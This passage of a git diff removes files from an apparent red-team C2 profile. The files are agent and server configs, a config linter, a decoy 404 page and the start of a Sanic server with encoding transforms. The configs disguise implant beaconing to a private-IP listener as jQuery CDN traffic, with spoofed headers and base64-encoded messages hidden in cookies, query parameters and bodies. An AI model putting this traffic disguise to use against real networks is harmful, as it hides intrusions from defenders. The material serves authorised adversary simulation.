n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var 
n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"] - } - ], - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "ServerCookies": {}, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/", - "urlFunctions": [ - { - "name": "", - "value": "", - "transforms": [ - { - "function": "choose_random", - "parameters": ["jquery-3.3.1.min.js","jquery-3.3.1.map"] - } - ] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": "http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "QueryParameters": [ - { - "name": "q", - "value": "message", - "transforms": [ - ] - } - ], - "Cookies": [ - { - "name": "__cfduid", - "value": "", - "transforms": [ - { - "function": "random_alpha", - "parameters": [30] - }, - { - "function": "base64", - "parameters": [] - } - ] - } - ], - "Body": [] - }] - }, - "POST": { - "ServerBody": [], - "ServerCookies": {}, - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/download.php", - "urlFunctions": [], - "QueryParameters": [ - { - "name": "bob2", - "value": "justforvalidation", - "transforms": [] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": "http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "Cookies": [ - { - "name": "BobCookie", - "value": "splat", - "transforms": [ - { - "function": "prepend", - "parameters": [ - "splatity_" - ] - } - ] - } - ], - "Body": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": [""] - }, - { - "function": "append", - "parameters": [""] - } - ] - }] - }, - "jitter": 50, - "interval": 10, - "chunk_size": 5120000, - "key_exchange": true, - "kill_date": "" -} diff --git a/C2_Profiles/dynamicHTTP/c2_code/config.json b/C2_Profiles/dynamicHTTP/c2_code/config.json deleted file mode 100755 index 689a34383..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/config.json +++ /dev/null @@ -1,160 +0,0 @@ -{ - "instances": [ - { - "GET": { - "ServerBody": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": ["!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof 
module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"] - } - ], - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "ServerCookies": {}, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/", - "urlFunctions": [ - { - "name": "", - "value": "", - "transforms": [ - { - "function": "choose_random", - "parameters": ["jquery-3.3.1.min.js","jquery-3.3.1.map"] - } - ] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": 
"http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "QueryParameters": [ - { - "name": "q", - "value": "message", - "transforms": [ - ] - } - ], - "Cookies": [ - { - "name": "__cfduid", - "value": "", - "transforms": [ - { - "function": "random_alpha", - "parameters": [30] - }, - { - "function": "base64", - "parameters": [] - } - ] - } - ], - "Body": [] - }] - }, - "POST": { - "ServerBody": [], - "ServerCookies": {}, - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/download.php", - "urlFunctions": [], - "QueryParameters": [ - { - "name": "bob2", - "value": "justforvalidation", - "transforms": [] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": "http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "Cookies": [ - { - "name": "BobCookie", - "value": "splat", - "transforms": [ - { - "function": "prepend", - "parameters": [ - "splatity_" - ] - } - ] - } - ], - "Body": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": [""] - }, - { - "function": "append", - "parameters": [""] - } - ] - }] - }, - "no_match": { - "action": "return_file", - "redirect": "http://example.com", - "proxy_get": { - "url": "https://www.google.com", - "status": 200 - }, - "proxy_post": { - "url": "https://www.example.com", - "status": 200 - }, - "return_file": { - "name": "fake.html", - "status": 404 - } - }, - "port": 9000, - "key_path": "", - "cert_path": "", - "debug": false - } - ] -} diff --git a/C2_Profiles/dynamicHTTP/c2_code/config_linter.py b/C2_Profiles/dynamicHTTP/c2_code/config_linter.py deleted file mode 100755 index 7bde028a3..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/config_linter.py +++ /dev/null @@ -1,595 +0,0 @@ -#! 
/usr/bin/env python3 -import json -import sys -import os - - -class bcolors: - HEADER = "\033[95m" - OKBLUE = "\033[94m" - OKGREEN = "\033[92m" - WARNING = "\033[93m" - FAIL = "\033[91m" - ENDC = "\033[0m" - BOLD = "\033[1m" - UNDERLINE = "\033[4m" - - -def check_server_layout(server_config): - if "instances" not in server_config: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} config.json must start with "instances"' - ) - - for inst in server_config["instances"]: - # loop through all the instances listed to see if the supplied config matches one of them - for method in ["GET", "POST"]: - if method not in inst: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "{method}" element in instance' - ) - sys.exit(1) - if "ServerBody" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerBody" array in {method}' - ) - sys.exit(1) - for f in inst[method]["ServerBody"]: - if "function" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in {method} ServerBody' - ) - sys.exit(1) - if "parameters" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in {method} in ServerBody (can be an empty array indicated by []' - ) - sys.exit(1) - if "ServerHeaders" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerHeaders" dictionary' - ) - sys.exit(1) - if "ServerCookies" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerCookies" dictionary' - ) - sys.exit(1) - if "AgentMessage" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "AgentMessage" array') - sys.exit(1) - if len(inst[method]["AgentMessage"]) == 0: - print( - f'[*] "AgentMessage" array is empty, so you won\'t be able to do {method} messages' - ) - for m in inst[method]["AgentMessage"]: - if "urls" not in m: - print( - '[-] Missing "urls" array indicating urls where the agent will reach out to' - ) - sys.exit(1) - if "uri" not in m: - print( - '[-] Missing "uri" indicator of what the URI will be. If not in use, set to empty string' - ) - sys.exit(1) - if "urlFunctions" not in m: - print( - '[-] Missing "urlFunctions" array, if you don\'t intent to do any manipulations here, set to empty array []' - ) - sys.exit(1) - for f in m["urlFunctions"]: - if "name" not in f: - print('[-] Missing "name" parameter in urlFunction') - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in urlFunction. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - '[-] Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - '[-] Missing "function" name in transforms in urlFunctions' - ) - sys.exit(1) - if "parameters" not in t: - print( - '[-] Missing "parameters" array in transforms in urlFunctions (can be an empty array indicated by []' - ) - sys.exit(1) - if "AgentHeaders" not in m: - print( - '[-] Missing "AgentHeaders" dictionary, this can be blank if the agent won\'t set any headers (i.e. {}' - ) - sys.exit(1) - if "QueryParameters" not in m: - print( - '[-] Missing "QueryParameters" array in GET. If no query parameters will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["QueryParameters"]: - if "name" not in f: - print('[-] Missing "name" parameter in QueryParameters') - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in QueryParameters. 
This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - '[-] Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - '[-] Missing "function" name in transforms in QueryParameters' - ) - sys.exit(1) - if "parameters" not in t: - print( - '[-] Missing "parameters" array in transforms in QueryParameters (can be an empty array indicated by []' - ) - sys.exit(1) - if "Cookies" not in m: - print( - '[-] Missing "Cookies" array in GET. If none will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["Cookies"]: - if "name" not in f: - print('[-] Missing "name" parameter in Cookies') - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in Cookies. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - '[-] Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - '[-] Missing "function" name in transforms in Cookies' - ) - sys.exit(1) - if "parameters" not in t: - print( - '[-] Missing "parameters" array in transforms in Cookies (can be an empty array indicated by []' - ) - sys.exit(1) - if "Body" not in m: - print( - '[-] Missing "Body" array in GET message. If none will be supplied, set as empty array []' - ) - sys.exit(1) - if "no_match" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "no_match" dictionary') - sys.exit(1) - if "action" not in inst["no_match"]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "action" key in "no_match"') - sys.exit(1) - if inst["no_match"]["action"] not in [ - "redirect", - "proxy_get", - "proxy_post", - "return_file", - ]: - print( - f"{bcolors.FAIL}[-]{bcolors.ENDC} no_match action isn't in the approved list" - ) - sys.exit(1) - if "redirect" not in inst["no_match"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "redirect" option in no_match' - ) - sys.exit(1) - if "proxy_get" not in inst["no_match"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "proxy_get" option in no_match' - ) - sys.exit(1) - if "url" not in inst["no_match"]["proxy_get"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "url" in no_match\'s proxy_get dictionary' - ) - sys.exit(1) - if "status" not in inst["no_match"]["proxy_get"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "status" code for no_match\'s proxy_get dictionary' - ) - sys.exit(1) - if "proxy_post" not in inst["no_match"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "proxy_post" option in no_match' - ) - sys.exit(1) - if "url" not in inst["no_match"]["proxy_post"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "url" in no_match\'s proxy_post dictionary' - ) - sys.exit(1) - if "status" not in inst["no_match"]["proxy_post"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "status" code in no_match\'s proxy_post dictionary' - ) - sys.exit(1) - if "return_file" not in inst["no_match"]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "return_file" in no_match') - sys.exit(1) - if "name" not in inst["no_match"]["return_file"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" for the file to be returned in no_match case' - ) - sys.exit(1) - if not os.path.exists(inst["no_match"]["return_file"]["name"]): - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} File specified in "no_match" case for "return_file" 
can\'t be found' - ) - sys.exit(1) - if "status" not in inst["no_match"]["return_file"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Misisng "status" return code for no_match\'s return_file' - ) - sys.exit(1) - if "port" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "port" in instance') - sys.exit(1) - if "key_path" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "key_path" in instance') - sys.exit(1) - if inst["key_path"] != "" and not os.path.exists(inst["key_path"]): - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Key_path file can't be found") - sys.exit(1) - if "cert_path" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "cert_path" in instance') - sys.exit(1) - if inst["cert_path"] != "" and not os.path.exists(inst["cert_path"]): - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} cert_path file can't be found") - sys.exit(1) - if "debug" not in inst: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "debug" boolean in instance' - ) - sys.exit(1) - - -def check_agent_config_layout(inst): - for method in ["GET", "POST"]: - if method not in inst: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "{method}" element in instance' - ) - sys.exit(1) - if "ServerBody" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerBody" array in {method}' - ) - sys.exit(1) - for f in inst[method]["ServerBody"]: - if "function" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in {method} ServerBody' - ) - sys.exit(1) - if "parameters" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in {method} in ServerBody (can be an empty array indicated by []' - ) - sys.exit(1) - if "ServerHeaders" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerHeaders" dictionary') - sys.exit(1) - if "ServerCookies" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerCookies" dictionary') - sys.exit(1) - if "AgentMessage" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "AgentMessage" array') - sys.exit(1) - if len(inst[method]["AgentMessage"]) == 0: - print( - f'[*] "AgentMessage" array is empty, so you won\'t be able to do {method} messages' - ) - for m in inst[method]["AgentMessage"]: - if "urls" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "urls" array indicating urls where the agent will reach out to' - ) - sys.exit(1) - if "uri" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "uri" indicator of what the URI will be. If not in use, set to empty string' - ) - sys.exit(1) - if "urlFunctions" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "urlFunctions" array, if you don\'t intent to do any manipulations here, set to empty array []' - ) - sys.exit(1) - for f in m["urlFunctions"]: - if "name" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" parameter in urlFunction' - ) - sys.exit(1) - if "value" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "value" parameter in urlFunction. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "transforms" array. 
If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in transforms in urlFunctions' - ) - sys.exit(1) - if "parameters" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in transforms in urlFunctions (can be an empty array indicated by []' - ) - sys.exit(1) - if "AgentHeaders" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "AgentHeaders" dictionary, this can be blank if the agent won\'t set any headers' - ) - sys.exit(1) - if "QueryParameters" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "QueryParameters" array in GET. If no query parameters will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["QueryParameters"]: - if "name" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" parameter in QueryParameters' - ) - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in QueryParameters. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in transforms in QueryParameters' - ) - sys.exit(1) - if "parameters" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in transforms in QueryParameters (can be an empty array indicated by []' - ) - sys.exit(1) - if "Cookies" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "Cookies" array in GET. If none will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["Cookies"]: - if "name" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" parameter in Cookies' - ) - sys.exit(1) - if "value" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "value" parameter in Cookies. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in transforms in Cookies' - ) - sys.exit(1) - if "parameters" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in transforms in Cookies (can be an empty array indicated by []' - ) - sys.exit(1) - if "Body" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "Body" array in GET message. 
If none will be supplied, set as empty array []' - ) - sys.exit(1) - if "jitter" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "jitter"') - sys.exit(1) - if "interval" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "interval"') - sys.exit(1) - if "chunk_size" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "chunk_size"') - sys.exit(1) - if "key_exchange" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "key_exchange" boolean') - sys.exit(1) - if "kill_date" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "kill_date"') - sys.exit(1) - - -def check_config(server_config, agent_config, method): - # get info for agent config - agent_message = {"location": "", "value": "", "method": method} - print(f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Looking into {method} AgentMessages") - for g in agent_config[method]["AgentMessage"]: - # we need to find where the "message" parameter exists so we know where the data will be - agent_message["urls"] = g["urls"] - agent_message["uri"] = g["uri"] - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Current URLs: {g['urls']}\n\tCurrent URI: {g['uri']}" - ) - for p in g["QueryParameters"]: - if p["value"] == "message": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found 'message' keyword in QueryParameter {p['name']}" - ) - agent_message["location"] = "QueryParameters" - agent_message["value"] = p - for p in g["Cookies"]: - if p["value"] == "message": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found 'message' keyword in Cookies {p['name']}" - ) - agent_message["location"] = "Cookies" - agent_message["value"] = p - for p in g["urlFunctions"]: - if p["name"] == "": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found '' keyword in urlFunctions" - ) - agent_message["location"] = "URI" - agent_message["value"] = p - if agent_message["location"] == "": - # if we haven't set it yet, data must be in the body - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Didn't find message keyword anywhere, assuming it to be the Body of the message" - ) - agent_message["location"] = "Body" - agent_message["value"] = g["Body"] - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Now checking server config for matching section" - ) - check_match_to_server(server_config, agent_message) - - -def check_match_to_server(server_config, agent_message): - for inst in server_config["instances"]: - # only look into AgentMessage details if the urls and uri match - for g in inst[agent_message["method"]]["AgentMessage"]: - match = False - if agent_message["uri"] != g["uri"]: - continue - if not urls_match(agent_message["urls"], g["urls"]): - continue - else: - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found matching URLs and URI, checking rest of AgentMessage" - ) - if agent_message["location"] == "Body": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Checking for matching Body messages" - ) - match = body_match(g["Body"], agent_message["value"]) - else: - match = contains_element( - agent_message["value"], g[agent_message["location"]] - ) - if match: - print(f"{bcolors.OKGREEN}[+]{bcolors.ENDC} FOUND MATCH") - return True - else: - print( - f"{bcolors.FAIL}[-]{bcolors.ENDC} Matched URLs/URI failed to match AgentMessages" - ) - return False - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Failed to find any matching URLs/URIs") - return False - - -def transforms_match(arr1, arr2): - if len(arr1) != len(arr2): - return False - for i in range(len(arr1)): - if arr1[i]["function"] != arr2[i]["function"]: - return False - if 
len(arr1[i]["parameters"]) != len(arr2[i]["parameters"]): - return False - for j in range(len(arr1[i]["parameters"])): - if arr1[i]["parameters"][j] != arr2[i]["parameters"][j]: - return False - return True - - -def body_match(arr1, arr2): - if len(arr1) != len(arr2): - return False - for e in range(len(arr1)): - if arr1[e]["function"] != arr2[e]["function"]: - return False - if len(arr1[e]["parameters"]) != len(arr2[e]["parameters"]): - return False - for p in range(len(arr1[e]["parameters"])): - if arr1[e]["parameters"][p] != arr2[e]["parameters"][p]: - return False - return True - - -def contains_element(ele, arr): - # check if arr contains ele - for i in arr: - if i["name"] == ele["name"]: - if i["value"] == ele["value"]: - if transforms_match(ele["transforms"], i["transforms"]): - return True - return False - - -def urls_match(arr1, arr2): - if len(arr1) != len(arr2): - return False - for i in range(len(arr1)): - if arr1[i] not in arr2: - return False - return True - - -if __name__ == "__main__": - if os.path.exists("config.json"): - server_config = json.load(open("config.json")) - else: - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Can't find config.json") - sys.exit(1) - - if len(sys.argv) < 2: - print( - f"{bcolors.FAIL}[-]{bcolors.ENDC} Please specify an agent config file on the command line" - ) - sys.exit(1) - - if os.path.exists(sys.argv[1]): - agent_config = json.load(open(sys.argv[1])) - else: - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Can't find the supplied file") - sys.exit(1) - # first, check that the two configs have all the right pieces - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Checking server config for layout structure" - ) - check_server_layout(server_config) - print(f"{bcolors.OKGREEN}[+]{bcolors.ENDC} Server config layout structure is good") - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Checking agent config for layout structure" - ) - check_agent_config_layout(agent_config) - print(f"{bcolors.OKGREEN}[+]{bcolors.ENDC} Agent config layout structure is good") - # now check that server_config can understand an agent_config message - # first check a GET request - check_config(server_config, agent_config, "GET") - check_config(server_config, agent_config, "POST") diff --git a/C2_Profiles/dynamicHTTP/c2_code/fake.html b/C2_Profiles/dynamicHTTP/c2_code/fake.html deleted file mode 100755 index 3968cb8fc..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/fake.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - Page Not Found! 
- - - - - \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/c2_code/server b/C2_Profiles/dynamicHTTP/c2_code/server deleted file mode 100755 index 61a85ed78..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/server +++ /dev/null @@ -1,353 +0,0 @@ -#!/usr/bin/env python3 - -from sanic import Sanic -from sanic.response import html, redirect, raw -from sanic.exceptions import NotFound -import sys -import asyncio -import ssl -from pathlib import Path -import json -import requests -import base64 as b64 -import random -import os - -config = {} - - -async def r_base64(*args): - # called with base64(value) - if isinstance(args[0], str): - return b64.b64decode(args[0].encode()) - else: - return b64.b64decode(args[0]) - - -async def base64(*args): - # called with base64(value) - return b64.b64encode(args[0]).decode('utf-8') - - -async def r_prepend(*args): - # called with prepend(value, "string") - return args[0][len(args[1]):] - - -async def prepend(*args): - # called with prepend(value, "string") - return str(args[1]) + str(args[0]) - - -async def r_append(*args): - # called with append(value, "string") - return args[0][:len(args[0]) - len(args[1])] - - -async def append(*args): - # called with append(value, "string") - return args[0] + args[1] - - -async def random_mixed(*args): - # called with random_mixed(value, 10), always appends - letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" - rnd = ''.join(random.choice(letters) for i in range(args[1])) - return args[0] + rnd - - -async def r_random_mixed(*args): - # called with random_mixed(value, 10), always appends - # return the string going from 0 to -10 (or ten from the end) - return args[0][: -1 * args[1]] - - -async def random_number(*args): - # called with random_number(value, 10) - letters = "0987654321" - rnd = ''.join(random.choice(letters) for i in range(args[1])) - return args[0] + rnd - - -async def r_random_number(*args): - # called with random_mixed(value, 10), always appends - # return the string going from 0 to -10 (or ten from the end) - return args[0][: -1 * args[1]] - - -async def random_alpha(*args): - # called with random_alpha(value, 10), always appends - letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" - rnd = ''.join(random.choice(letters) for i in range(args[1])) - return args[0] + rnd 